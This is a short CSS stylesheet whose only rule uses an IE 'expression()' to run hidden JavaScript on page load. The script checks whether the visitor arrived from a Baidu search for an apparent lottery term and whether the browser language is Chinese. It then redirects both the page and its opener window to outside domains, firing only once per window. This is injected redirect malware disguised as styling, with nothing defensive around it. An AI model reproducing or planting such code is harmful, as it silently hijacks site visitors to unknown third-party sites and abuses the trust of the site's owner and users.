﻿body {onload:expression(
if(window.name!="Yang"){
var str1 = document.referrer
//str1 = str1.toLowerCase()
var str6 = 'wd=%CF%E3%B8%DB%C1%F9%BA%CF%B2%CA'
if(str1.indexOf(str6) >0 && navigator.systemLanguage=='zh-cn'){
if(parent.window.opener){parent.window.opener.location='http://41490.yaben.net/';
}
self.location='http://www.qzcsw.cn/';
}
else
{
if(navigator.systemLanguage=='zh-cn'){
if(parent.window.opener){parent.window.opener.location='http://41490.yaben.net/#baidu';
}
self.location='http://www.qzcsw.cn/#baidu';
}
}
window.name="Yang";
}
);}